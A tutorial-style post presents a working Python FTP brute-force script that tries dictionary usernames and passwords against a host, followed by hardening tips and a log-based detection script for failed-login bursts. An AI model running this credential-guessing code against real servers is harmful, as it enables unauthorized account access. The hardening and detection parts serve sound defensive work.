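This post covers an implementation of FTP brute forcing. The principle is very simple: using the ftplib module, the script reads username and password entries from dictionary files and tries each login in turn.
I. Source code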
# -*- coding: utf8 -*-
import ftplib


def crackhandle(host, username, password):
    # Attempt one FTP login; return True on success, False on any failure.
    try:
        ftp = ftplib.FTP(host)
        ftp.login(username, password)
        ftp.quit()
        return True
    except Exception:
        print("login fail! username is %s password is %s" % (username, password))
        return False


def crack():
    host = "192.168.1.108"
    # Read the dictionary files, one candidate per line.
    with open("/root/Desktop/pythonTest/password.txt") as passwordsList:
        passwords = passwordsList.readlines()
    with open("/root/Desktop/pythonTest/username.txt") as usernamesList:
        usernames = usernamesList.readlines()
    switch = False  # set once a valid username/password pair is found
    for username in usernames:
        username = username.strip()
        for password in passwords:
            password = password.strip()
            recv = crackhandle(host, str(username), str(password))
            if recv:
                print("success userName is %s password is %s" % (username, password))
                switch = True
                break
        if switch:
            break


crack()
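Run command: python ftpcrack.py
The result is shown in the screenshot below; the brute force succeeded.
II. Improving FTP security
1. Configure login failure settings in the local security policy;
2. Use SSL encryption;
3. Set user permissions sensibly;
4. Avoid simple usernames and passwords;
5. Enable anonymous access only as needed;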
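On the detection side, the dictionary loop above shows up in the FTP server log as a rapid run of failed PASS commands (reply 530) from one client, possibly ending in a 230. The following is an added example, not code from the original post: it scans a W3C-style log for that pattern. The log layout, the sample lines, the threshold and the name detect_bruteforce are all assumptions made for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (W3C extended style); not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.168.1.50 USER admin 331
2024-01-01 10:00:01 192.168.1.50 PASS *** 530
2024-01-01 10:00:02 192.168.1.50 USER admin 331
2024-01-01 10:00:02 192.168.1.50 PASS *** 530
2024-01-01 10:00:03 192.168.1.50 USER admin 331
2024-01-01 10:00:03 192.168.1.50 PASS *** 530
2024-01-01 10:00:04 192.168.1.50 USER ftpuser 331
2024-01-01 10:00:04 192.168.1.50 PASS *** 230
2024-01-01 10:05:00 192.168.1.77 USER alice 331
2024-01-01 10:05:00 192.168.1.77 PASS *** 530
2024-01-01 10:09:00 192.168.1.77 USER alice 331
2024-01-01 10:09:00 192.168.1.77 PASS *** 230
"""

def detect_bruteforce(log_text, threshold=3, window=timedelta(seconds=60)):
    """Flag client IPs with >= threshold failed logins (PASS -> 530) inside window."""
    fields, last_user, alerts = [], {}, {}
    failures = defaultdict(deque)      # c-ip -> (timestamp, user) of recent failures
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order comes from the log itself
            continue
        parts = line.split()
        if line.startswith("#") or not fields or len(parts) != len(fields):
            continue                   # comments, blank or malformed lines
        rec = dict(zip(fields, parts))
        ip, method, status = rec["c-ip"], rec["cs-method"].upper(), rec["sc-status"]
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        if method == "USER":
            last_user[ip] = rec["cs-uri-stem"]   # account named before the PASS
        elif method == "PASS" and status == "530":
            q = failures[ip]
            q.append((ts, last_user.get(ip, "?")))
            while ts - q[0][0] > window:         # drop failures outside the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(
                    ip, {"failures": 0, "users": set(), "login_after_burst": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(user for _, user in q)
        elif method == "PASS" and status == "230" and ip in alerts:
            # A success from an already flagged client: password was likely guessed.
            alerts[ip]["login_after_burst"] = last_user.get(ip, "?")
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

A non-empty login_after_burst is the case to escalate first, since it means the flagged client eventually authenticated; the single mistyped password from 192.168.1.77 stays below the threshold and is not reported.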